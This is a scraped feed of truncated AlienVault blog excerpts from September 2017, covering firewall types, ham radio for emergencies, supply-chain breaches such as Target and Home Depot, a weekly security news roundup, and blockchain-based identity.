effectively filtered by firewalls because they contain more information in their headers. TCP packets contain information such as source and destination addresses, packet sequence information, and payload. That information allows your network interface to deliver data properly, and a firewall can compare that information to the rules you configured it with. For example, all HTTPS data is transmitted through TCP packets. When HTTPS data is sent to your computer through your network interface while you surf the web, your operating system will know that it's data that's supposed to go to your web browser. The same applies if you are surfing the web - on your phone, on your PC, or even on a server machine in your datacenter. With the proliferation of the Internet of Things, you might even be surfing the web from a touchscreen embedded in your refrigerator. Your HTTPS data is used the same way regardless. UDP packets can be filtered by port, but their headers lack the information that TCP packets have for more sophisticated filtering. There are three basic types of firewalls. Stateless or packet filtering firewalls inspect each packet individually, without considering the trends of the data you're receiving. Imagine a bouncer at a nightclub. Each person lining up to get in will be considered on an individual basis. There might be people on their own, parties of one. There might be people trying to get in as a social group. The bouncer may be instructed to forbid kids who are below legal drinking age and people who are wearing criminal gang colors from entering the club, those are your firewall rules. Instead of looking at a high school kid in a group of high school kids and just excluding them as a collective, the bouncer will look at each individual high school kid and insist that they present their ID. Stateful firewalls do what stateless firewalls do, and they also consider the connection states of streams of data. This is the bouncer who may see one high school kid and then reject the whole group of high school kids, rather than asking each of them to prove their age. Stateful firewalls will collect a series of packets before it determines their connection state, and then compares those findings to the firewall rules, rather than applying the rules to each individual packet of data. Application firewalls generally do everything that stateful firewalls do, and they also analyze the actual data content of the packets, not just the headers. I suppose the nightclub bouncer becomes a TSA agent at the airport, making you go through a metal detector and a full body x-ray. Application firewalls allow you to set firewall rules for individual applications. That's how the software firewall I installed on my Android]]> 2017-09-27T13:00:00+00:00 http://feeds.feedblitz.com/~/461914644/0/alienvault-blogs~Explain-How-Firewalls-Work-to-Me www.secnews.physaphae.fr/article.php?IdArticle=412872 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC (EMCOM). Let’s start with a quick overview of the Amateur Radio Service. Ham Radio is a huge hobby with considerable width and breadth, as such, I’m going to use lots of generalization and gross simplification. But it starts with passing an exam and being licensed by the FCC. Exams must be taken in person and on paper generally. The American Radio Relay League has a list of exam providers and locations. The exams are based on a published question pool and the fee for the exam is between free and $15. There are three levels of licensing: Technician, General,and Extra that grant the ability to use different allocations of the radio spectrum. The exams are not difficult, they are multiple choice and there are lots of study resources available, including mobile apps. There is no requirement to send Morse Code anymore! Once you pass your test, you do have to wait a few days to get your license and callsign, these are published on the FCC’s website; my entry is here. The Technician license gives you access to Ham Radio Bands in the VHF/UHF range (30mhz - 10ghz). Radio waves in this range are generally line of sight (LoS). You must have an unobstructed path between your transmitter and the receiver at the destination. This is what you have probably experienced with GMRS/FRS radios (which are UHF). In order to extend the range and usefulness of LoS communications, repeaters placed in elevated locations are used. This can be extended even further with the use of linked repeaters. Repeaters do exactly what their name sounds like, they receive your signal and then re-broadcast it. As licensed operators, we also have the ability to use far more power (up to 1500 watts) than the GMRS/FRS radios (about 1 watt). Systems based on these frequency ranges are used for local communications, generally within a metro area. The General license type gives you access to the HF bands (1mhz - 29mhz). In this frequency range the radio waves travel by skywave instead of LoS. This allows you to potentially talk around the world by bouncing radio waves off of the ionosphere. The distance and direction of your communications are heavily dependent on the condition of the ionosphere. Things that affect the ionosphere: Da]]> 2017-09-26T13:00:00+00:00 http://feeds.feedblitz.com/~/461639490/0/alienvault-blogs~Ham-Radio-for-Emergency-Communications www.secnews.physaphae.fr/article.php?IdArticle=412388 False None Solardwinds None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC In August 2010, FSA hits Zurich Insurance with a £2.275m fine for data loss for not checking their controls over outsourced data processing. In August 2008, Zurich SA lost an unencrypted back-up tape during a routine transfer to a data storage centre. As there were no proper reporting lines in place Zurich UK did not learn of the incident until a year later. In December 2013, Target had a data breach that impacted 70 million customers. In this attack, attackers broke into the retailer’s network using network credentials stolen from their third-party supplier that provided refrigeration and HVAC systems. In November 2014, Home Depot had a data breach where hackers stole 56 million customer credit and debit card accounts and 53 million customer email addresses. Home Depot said the hackers initially broke in using credentials stolen from a third-party vendor. The attackers used a third-party vendor’s user name and password to enter the perimeter of Home Depot’s network. In the fall of 2015, Wendy’s fast food restaurants had an incident that disclosed and exposed customer credit card data. The malware installed in point-of-sale systems was discovered at over 1,000 of its franchised U.S. restaurants. Hackers gained access to the machines using remote access credentials of a third-party service provider. In July 2017, a reported 14 million Verizon subscribers may have been affected by a data breach. These records were held on a server that was controlled by Israel based Nice Systems. Nice Systems is not a small company. Instead, they are an extremely well-known and trusted company that 85 of the Fortune 100 work with. Verizon said that it “provided the vendor” with data as part of an ongoing project. The spokesperson said that the employee of Nice incorrectly allowed external access. Attackers have become smarter and they are choosing the path of least resistance to break into an organisation. The above mentioned incidents highlight a key point that organisation suffered the data loss not because of an attack or failure of control on their side, but the supplier side. The real target for the RSA breach was not RSA but it was their customer(s). Big organisations are more likely to have security breaches due to higher probability of a weak link in their complex supply chain ecosystem. How have regulators and organisations responded? Regulators responded to this issue by putting in place requirements for organisations to have an assurance process for managing supplier security risks. A number of organisations responded to this regulatory requirement by putting in place a “Supplier Security Assurance Framework” that includes a supplier security policy and supplier security due-diligence process for managing supplier security risks. In 2014, UK government published a Cyber Essentials Scheme to reduce the levels of cyber security risk in its supply chain. The scheme defines a set of controls which, when properly implemented, provide organisati]]> 2017-09-25T13:00:00+00:00 http://feeds.feedblitz.com/~/461297656/0/alienvault-blogs~Securing-The-Supply-Chain-Is-As-Important-As-Securing-The-Front-Door www.secnews.physaphae.fr/article.php?IdArticle=411993 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Meet APT33: A Gnarly Iranian Hacker Crew Threatening Destruction |Forbes Threat data, IOCs and information on APT33, aka greenbug | OTX Data breaches and Class action lawsuits Should individuals whose data has been breached have the right to sue companies? It’s a tricky question, and one that the courts are seemingly having trouble on deciding on. Recently, a judge dismissed two consolidated class actions by more than 21m federal employees who had information breached by the Office of Personnel Management (OPM). The Judge concluded that the federal employees could not establish their threshold right to sue in federal court because they had not shown they faced imminent risk of identity theft, even though nearly two dozen of those named in the class actions claimed their confidential information has already been misused. Hopefully things will change going forward. The problem with identity theft is that it’s not time-dependant. An attacker could hoard details for a long period before committing a crime. And even when an identity is stolen, it is difficult to tie back to where the breach occurred. OPM Data Breach Lawsuit Tossed, Fed Plaintiffs will Appeal | Dark Reading OPM Says Gov't Workers' Data Breach Suit Fails | Law360 In the long run, class actions may not be the best way to redress data breaches | Reuters Somewhat related, My three years in identity theft hell | Bloomberg The Ghost of Windows XP As the lyrics go, “They stab it with their steely knives, but they just can’t kill the beast.” In this case, the beast seems to be Win XP, which, despite being woefully outdated, continues to make its presence felt. The latest announcement being that a fifth of the Manchester police department are running Win XP. Manchester police still relies on Windows XP | BBC Manchester Police are using Windows XP on one in five computers | V3 When insurance goes too far Melina Efthimiadis along with her husband wanted to add personal umbrella liability insurance to their Nationwide homeowner's policy. She says they have been low risk clients so she didn't think it would be a problem. In the application process for Nationwide, Melina says they had to write down the number of dogs they owned and their breeds, wh]]> 2017-09-22T13:00:00+00:00 http://feeds.feedblitz.com/~/460675978/0/alienvault-blogs~Things-I-hearted-this-week-September www.secnews.physaphae.fr/article.php?IdArticle=411332 False Guideline APT33,CCleaner,APT 33 None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC About a month ago, there was a bit of shock when it was reported that a company had developed an implantable chip that could be used for simple tasks such as opening a door, or authenticating you to a computer system. This implantable biochip and its associated perils is reminiscent of those in so many science fiction movies. Many of us recoiled at the idea that we would become trackable by organizations that we did not trust. Is it too late to reconsider this idea? Many would say that the bio-chip data must be stored somewhere, so it is just as vulnerable as the data that was already taken, so how is it any different than that held by the credit bureaus? This difference is that the biochip companies have a clean security slate from which to build their practice and they have plenty of breach history to draw upon in order to avoid doing it incorrectly. However, is that any guarantee that they will get it right? Of course not. I, like most, am not ready for my biochip. Perhaps the next system of identification could be based on blockchain technology, whereby we are all issued a hash number. Think of the possibilities of that. We can all have a unique identifier based on a characteristic that is unique to each of us. Perhaps a hash value of the digitized value of all of your fingerprints, or the hash of your iris scan at a particular point in time. The interesting part would be that all biological children of two individuals would be given an identity generated from the parents’ hash IDs until such time that they may be issued an individual hash. The worst part of all the recent data loss is that no matter what method is devised to replace our identities, it must still be linked back to those old, stolen credentials, or much of the economic structures of society will unravel. We are certainly at the doorway of a new age of identity and identity protection.    ]]> 2017-09-20T13:00:00+00:00 http://feeds.feedblitz.com/~/460155244/0/alienvault-blogs~Blockchain-Technology-as-a-Replacement-for-Our-Stolen-Identities www.secnews.physaphae.fr/article.php?IdArticle=410310 False None Equifax None